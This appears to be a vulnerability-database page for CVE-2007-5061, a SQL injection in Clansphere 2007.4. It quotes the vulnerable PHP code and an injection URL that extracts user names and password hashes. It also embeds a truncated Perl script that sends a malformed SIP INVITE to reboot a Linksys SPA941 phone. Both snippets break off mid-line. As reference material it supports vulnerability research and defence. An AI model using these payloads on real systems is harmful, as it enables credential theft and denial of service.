CVE-2007-5061
published 2007-09-24CVE-2007-5061: SQL injection vulnerability in mods/banners/navlist.php in Clansphere 2007.4 allows remote attackers to execute arbitrary SQL commands via the cat_id parameter…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.17%
63.4th percentile
SQL injection vulnerability in mods/banners/navlist.php in Clansphere 2007.4 allows remote attackers to execute arbitrary SQL commands via the cat_id parameter to index.php in a banners action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| clansphere | clansphere | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ClanSphere 2007.4 - 'cat_id' SQL Injection
exploitdb·2007-09-22
CVE-2007-5061 ClanSphere 2007.4 - 'cat_id' SQL Injection
ClanSphere 2007.4 - 'cat_id' SQL Injection
---
#########################################################################################
#
# Inclusion Hunter Team
# http://www.ihteam.net
#
#
# [Clansphere 2007.4]
#
#
# Class: SQL Injection
# Found: 22/09/2007
# Remote: Yes
# Site: http://www.clansphere.net/
# Download: http://sourceforge.net/project/showfiles.php?group_id=95430
#
#########################################################################################
Vulnerable code:
mods/banners/navlist.php
if(!empty($_GET['cat_id'])) {
$where = "categories_id = '" . $_GET['cat_id'] . "'";
Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):
http://www.site.com/[path]/index.php?mod=banners&cat_id=-1'%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,users_pwd),null,nu
ll%20FR
Exploit-DB
Linksys SPA941 - Remote Reboot (Denial of Service)
exploitdb·2007-04-24
CVE-2007-2270 Linksys SPA941 - Remote Reboot (Denial of Service)
Linksys SPA941 - Remote Reboot (Denial of Service)
---
#!/usr/bin/perl
use IO::Socket;
#die "Usage $0 " unless ($ARGV[2]);
die "Usage $0 " unless ($ARGV[0]);
my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort => $ARGV[3], Proto => 'udp');
$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060', Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061');
$touser=$ARGV[0];
$target=$ARGV[1];
$sourceaddress=$ARGV[2];
$sourceport=$ARGV[3];
$high=2000;
$low=1;
$fromuserid = int(rand( $high-$low+1 ) ) + $low;
my $cseq = "INVITE";
$msg = "INVITE sip:$touser\@$target SIP/2.0\r
Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r
From: \377;tag=779\r
To: Receiver \r
Call-ID: 10\@$sourceaddress\r
CSeq: 1 $cseq\r
Contact: 779 \r
Expire
No writeups or analysis indexed.
http://osvdb.org/37260http://secunia.com/advisories/26940http://www.securityfocus.com/bid/25770http://www.vupen.com/english/advisories/2007/3249https://exchange.xforce.ibmcloud.com/vulnerabilities/36744https://www.exploit-db.com/exploits/4443http://osvdb.org/37260http://secunia.com/advisories/26940http://www.securityfocus.com/bid/25770http://www.vupen.com/english/advisories/2007/3249https://exchange.xforce.ibmcloud.com/vulnerabilities/36744https://www.exploit-db.com/exploits/4443
2007-09-24
Published